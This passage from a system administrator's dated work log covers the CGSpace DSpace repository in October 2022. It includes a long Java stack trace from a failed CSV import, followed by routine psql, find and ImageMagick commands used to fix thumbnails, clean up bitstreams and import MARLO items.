at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
at org.apache.cocoon.components.source.impl.SitemapSource.<init>(SitemapSource.java:148)
at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy190.setup(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
at org.apache.cocoon.components.source.impl.SitemapSource.<init>(SitemapSource.java:148)
at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy190.setup(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
at org.apache.cocoon.components.source.impl.SitemapSource.<init>(SitemapSource.java:148)
at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy190.setup(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
at org.apache.cocoon.components.source.impl.SitemapSource.<init>(SitemapSource.java:148)
at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy190.setup(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
at org.apache.cocoon.components.source.impl.SitemapSource.<init>(SitemapSource.java:148)
at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy190.setup(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
at org.apache.cocoon.components.source.impl.SitemapSource.<init>(SitemapSource.java:148)
at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy190.setup(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
at org.apache.cocoon.components.source.impl.SitemapSource.<init>(SitemapSource.java:148)
at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy190.setup(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:411)
at sun.reflect.GeneratedMethodAccessor331.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy189.process(Unknown Source)
at org.apache.cocoon.components.treeprocessor.sitemap.SerializeNode.invoke(SerializeNode.java:147)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:171)
at org.apache.cocoon.components.treeprocessor.TreeProcessor.process(TreeProcessor.java:247)
at org.apache.cocoon.components.treeprocessor.sitemap.MountNode.invoke(MountNode.java:117)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:171)
at org.apache.cocoon.components.treeprocessor.TreeProcessor.process(TreeProcessor.java:247)
at org.apache.cocoon.components.treeprocessor.sitemap.MountNode.invoke(MountNode.java:117)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:171)
at org.apache.cocoon.components.treeprocessor.TreeProcessor.process(TreeProcessor.java:247)
at org.apache.cocoon.servlet.RequestProcessor.process(RequestProcessor.java:351)
at org.apache.cocoon.servlet.RequestProcessor.service(RequestProcessor.java:169)
at org.apache.cocoon.sitemap.SitemapServlet.service(SitemapServlet.java:84)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:728)
at org.apache.cocoon.servletservice.ServletServiceContext$PathDispatcher.forward(ServletServiceContext.java:468)
at org.apache.cocoon.servletservice.ServletServiceContext$PathDispatcher.forward(ServletServiceContext.java:443)
at org.apache.cocoon.servletservice.spring.ServletFactoryBean$ServiceInterceptor.invoke(ServletFactoryBean.java:264)
at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172)
at org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:204)
at com.sun.proxy.$Proxy186.service(Unknown Source)
at org.dspace.springmvc.CocoonView.render(CocoonView.java:113)
at org.springframework.web.servlet.DispatcherServlet.render(DispatcherServlet.java:1216)
at org.springframework.web.servlet.DispatcherServlet.processDispatchResult(DispatcherServlet.java:1001)
at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:945)
at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:867)
at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:951)
at org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:853)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:647)
at org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:827)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:728)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:303)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.dspace.app.xmlui.cocoon.SetCharacterEncodingFilter.doFilter(SetCharacterEncodingFilter.java:113)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter.doFilter(DSpaceCocoonServletFilter.java:160)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.dspace.app.xmlui.cocoon.servlet.multipart.DSpaceMultipartFilter.doFilter(DSpaceMultipartFilter.java:119)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.dspace.utils.servlet.DSpaceWebappServletFilter.doFilter(DSpaceWebappServletFilter.java:78)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:219)
at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:110)
at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:492)
at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:165)
at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:104)
at org.apache.catalina.valves.CrawlerSessionManagerValve.invoke(CrawlerSessionManagerValve.java:235)
at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:1025)
at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)
at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:451)
at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1201)
at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:654)
at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:317)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
at java.lang.Thread.run(Thread.java:750)
```
- So this breakage is a side effect of the `org.apache.cocoon.uploads.autosave=false` change I made a few weeks ago
- Importing the CSV via the command line works fine
## 2022-10-04
- I stumbled across more low-quality thumbnails on CGSpace
- Some have the description "Generated Thumbnail", and others are manually uploaded ".jpg.jpg" ones...
- I want to add some more thumbnail fixer scripts to the cgspace-java-helpers suite:
- If an item has an `IM Thumbnail` and a `Generated Thumbnail` in the `THUMBNAIL` bundle, remove the `Generated Thumbnail`
- If an item has a PDF bitstream and a JPG bitstream with description /thumbnail/ in the ORIGINAL bundle, remove the /thumbnail/ bitstream in the ORIGINAL bundle and try to remove the /thumbnail/.jpg bitstream in the THUMBNAIL bundle
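- A rough way to gauge how many bitstreams have the "Generated Thumbnail" description, since bitstream metadata lives in `metadatavalue` in DSpace 6 (a sketch, not an exact count of affected items):

```console
$ psql -h localhost -U postgres -d dspacetest -c "SELECT COUNT(*) FROM metadatavalue WHERE text_value='Generated Thumbnail';"
```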
## 2022-10-05
- I updated the [cgspace-java-helpers](https://github.com/ilri/cgspace-java-helpers) to include a new `FixLowQualityThumbnails` script to detect the low-quality thumbnails I found above
- Add missing ORCID identifier for an Alliance author
- I've been running the `dspace cleanup -v` script on CGSpace every few weeks or months and assuming it finished successfully because I didn't get an error on stdout/stderr, but today I noticed that the script keeps saying it is deleting the same bitstreams
- I looked in dspace.log and found the error I used to see a lot:
```console
Caused by: org.postgresql.util.PSQLException: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
Detail: Key (uuid)=(99b76ee4-15c6-458c-a940-866148bc7dee) is still referenced from table "bundle".
```
- If I mark the primary bitstream as null manually the cleanup script continues until it finds a few more
- I ended up with a long list of UUIDs to fix before the script would complete:
```console
$ psql -d dspace -c "update bundle set primary_bitstream_id=NULL where primary_bitstream_id in ('b76d41c0-0a02-4f53-bfde-a840ccfff903','1981efaa-eadb-46cd-9d7b-12d7a8cff4c4','97a8b1fa-3c12-4122-9c7b-fc2a3eaf570d','99b76ee4-15c6-458c-a940-866148bc7dee','f330fc22-a787-46e2-b8d0-64cc3e166124','592f4a0d-1ed5-4663-be0e-958c0d3e653b','e73b3178-8f29-42bc-bfd1-1a454903343c','e3a5f592-ac23-4934-a2b2-26735fac0c4f','73f4ff6c-6679-44e8-8cbd-9f28a1df6927','11c9a75c-17a6-4966-a4e8-a473010eb34c','155faf93-92c5-4c17-866e-1db50b1f9687','8e073e9e-ab54-4d99-971a-66de073d51e3','76ddd62c-6499-4a8c-beea-3fc8c60200d8','2850fcc9-f450-430a-9317-c42def74e813','8fef3198-2aea-4bd8-aeab-bf5fccb46e42','9e3c3528-e20f-4da3-a0bd-ae9b8515b770')"
```
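- In the future we could probably find all of the offending bundles in one pass instead of waiting for the cleanup script to fail on each one, something like this (assuming the cleanup is removing bitstreams flagged as deleted):

```console
$ psql -d dspace -c "SELECT uuid, primary_bitstream_id FROM bundle WHERE primary_bitstream_id IN (SELECT uuid FROM bitstream WHERE deleted='t');"
```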
## 2022-10-06
- I finished running the cleanup script on CGSpace, and the before and after count of bitstreams in the assetstore is interesting:
```console
$ find /home/cgspace.cgiar.org/assetstore -type f | wc -l
181094
$ find /home/cgspace.cgiar.org/assetstore -type f | wc -l
178329
```
- So that cleaned up ~2,700 bitstreams!
- Interesting, someone on the DSpace Slack mentioned this as being a known issue with discussion, reproducers, and a pull request: https://github.com/DSpace/DSpace/issues/7348
- I am having an issue with the new FixLowQualityThumbnails script on some communities like 10568/117865 and 10568/97114
- For some reason it doesn't descend into the collections
- Also, my old FixJpgJpgThumbnails doesn't either... weird
- I might have to resort to getting a list of collections and doing it that way:
```console
$ psql -h localhost -U postgres -d dspacetest -c 'SELECT ds6_collection2collectionhandle(uuid) FROM collection WHERE uuid in (SELECT uuid FROM collection);' |
sed 1,2d |
tac |
sed 1,3d > /tmp/collections
```
- Strange, I don't think doing it by collections is actually working: the script says it's replacing the bitstreams, but nothing actually changes
- I don't have time to figure out what's happening; I see "update_item" in dspace.log when the script claims it's doing the replacement, but the change never takes effect
- I might just extract a list of items that have .jpg.jpg thumbnails from the database and run the script through item mode
- There might be a problem with the context commit logic...?
- I exported a list of items that have .jpg.jpg thumbnails on CGSpace:
```console
$ psql -h localhost -p 5432 -U postgres -d dspacetest -c "SELECT ds6_bitstream2itemhandle(dspace_object_id) FROM metadatavalue WHERE text_value ~ '.*\.(jpg|jpeg|JPG|JPEG)\.(jpg|jpeg|JPG|JPEG)' AND dspace_object_id IS NOT NULL;" |
sed 1,2d |
tac |
sed 1,3d |
grep -v '␀' |
sort -u |
sed 's/ //' > /tmp/jpgjpg-handles.txt
```
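- Then I could feed those handles to the script one at a time, something like this (assuming the `dspace dsrun` invocation and fully qualified class name from the cgspace-java-helpers README):

```console
$ while read -r handle; do dspace dsrun io.github.ilri.cgspace.scripts.FixJpgJpgThumbnails "$handle"; done < /tmp/jpgjpg-handles.txt
```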
- I restarted DSpace Test because it had high load since yesterday and I don't know why
- Run `check-duplicates.py` on the 1642 MARLO Innovations to try to include matches from the OICRs we uploaded last month
- Then I processed those matches like I did with the OICRs themselves last month, and then cleaned them one last time with csv-metadata-quality, created a SAF bundle, and uploaded them to CGSpace
- BTW this bumps CGSpace over 100,000 items...
- Then I did the same for the 749 MARLO MELIAs and imported them to CGSpace
- Meeting about CG Core types with Abenet, Marie-Angelique, Sara, Margarita, and Valentina
- I made some minor logic changes to the FixJpgJpgThumbnails script in cgspace-java-helpers
- Now it checks to make sure the bitstream description is not empty or null, and also excludes Maps (in addition to Infographics) since those are likely to be JPEG files in the ORIGINAL bundle on purpose
## 2022-10-07
- I did the matching and cleaning on the 512 MARLO Policies and uploaded them to CGSpace
- I sent a list of the IDs and Handles for all four groups of MARLO items to Jose so he can do the redirects on their server:
```console
$ wc -l /tmp/*mappings.csv
1643 /tmp/crp-innovation-mappings.csv
750 /tmp/crp-melia-mappings.csv
683 /tmp/crp-oicr-mappings.csv
513 /tmp/crp-policy-mappings.csv
3589 total
```
- I fixed the mysterious issue with my cgspace-java-helpers scripts not working on communities and collections
- It was because the code wasn't committing the context!
- I ran both `FixJpgJpgThumbnails` and `FixLowQualityThumbnails` on a dozen or so large collections on CGSpace and processed about 1,200 low-quality thumbnails
- I did a complete re-sync of CGSpace to DSpace Test
## 2022-10-08
- Start a harvest on AReS
- Experiment with PDF thumbnails in ImageMagick again, I found an [interesting reference on their legacy website](https://legacy.imagemagick.org/Usage/thumbnails/) saying we can use `-unsharp` after `-thumbnail` to make them less blurry
- Here are a few examples of unsharp values (starting from DSpace's default flattened JPEG of the PDF, then creating the thumbnail in a second operation):
```console
$ convert '10568-103447.pdf[0]' -flatten 10568-103447-dspace-step1.pdf.jpg
$ convert 10568-103447-dspace-step1.pdf.jpg -thumbnail 600x600 -unsharp 0x.5 10568-103447-dspace-step2-600-unsharp.pdf.jpg
$ convert 10568-103447-dspace-step1.pdf.jpg -thumbnail 600x600 -unsharp 2x0.5+0.7+0 10568-103447-dspace-step2-600-unsharp2.pdf.jpg
$ convert 10568-103447-dspace-step1.pdf.jpg -thumbnail 600x600 -unsharp 0x0.75+0.75+0.008 10568-103447-dspace-step2-600-unsharp3.pdf.jpg
$ convert 10568-103447-dspace-step1.pdf.jpg -thumbnail 600x600 -unsharp 1.5x1+0.7+0.02 10568-103447-dspace-step2-600-unsharp4.pdf.jpg
```
- I merged all the changes from `6_x-dev` to `6_x-prod` after having run them on DSpace Test for the last ten days
## 2022-10-11
- I put together the microsite for improving DSpace PDF thumbnails: https://github.com/alanorth/improved-dspace-thumbnails/
- I need to make the pull request to DSpace
- I also discussed the thumbnails with Dani in Addis
## 2022-10-12
- I submitted a pull request to DSpace 7 for the `-unsharp 0x0.5` change: https://github.com/DSpace/DSpace/pull/8515
- I did some tests on CGSpace and verified that MEL will indeed need admin permissions on every collection that they want to map to
- I had a call with Salem and he asked me about redirecting from some CRP duplicates that exist in both MELSpace and CGSpace
- We decided that the only way is to use an HTTP 301 redirect in the nginx web server, but I said that I'd check with CNRI to see if there was a way to do this within the Handle system
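- A sketch of what such a redirect might look like in nginx, with hypothetical handles on both sides:

```console
# Permanently redirect a duplicate item's handle URL to its counterpart in the
# other repository (hypothetical handles; the Handle system itself would still
# resolve to the old location)
location = /handle/10568/00000 {
    return 301 https://hdl.handle.net/20.500.11766/00000;
}
```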
## 2022-10-13
- Disable the REST API cache on CGSpace temporarily to see if that fixes a strange problem we are seeing with listing publications on ilri.org
- Meeting with MEL, MARLO, and CG Core people to continue discussing `dcterms.type`
- I added the new MEL account to all the appropriate authorizations for Initiatives that ICARDA is involved in on CGSpace
- I still have to add the few that WorldFish is involved in
## 2022-10-14
- Abenet finalized adding the MEL user to all initiative collections on CGSpace
- Re-sync CGSpace to DSpace Test to get the new MEL user and authorizations
- I checked ilri.org and I see more publications for 2021 and earlier
- The results are still strange though because I only see a few for each year
## 2022-10-15
- I'm going to turn the REST API cache on CGSpace back on to see if the ilri.org publications thing gets broken again
- Start a harvest on AReS
## 2022-10-16
- The harvest on AReS finished but somehow there are 10,000 fewer items than the previous indexing... hmmm
- I don't see any hits from MELSpace there so I will start another harvest...
- After starting the harvesting the load on the server went up to 20 and UptimeRobot said CGSpace was down for three hours, sigh
- I stopped the harvesting and the load went down immediately
- I am trying to find a pattern with the load on Sundays
- I see this in the AReS backend logs:
```console
[Nest] 1 - 10/16/2022, 6:42:04 PM [HarvesterService] Starting Harvest =>0
[Nest] 1 - 10/16/2022, 6:42:07 PM [HarvesterService] Starting Harvest =>101555
[Nest] 1 - 10/16/2022, 6:42:10 PM [HarvesterService] Starting Harvest =>4936
```
- Which means MELSpace is having some issue
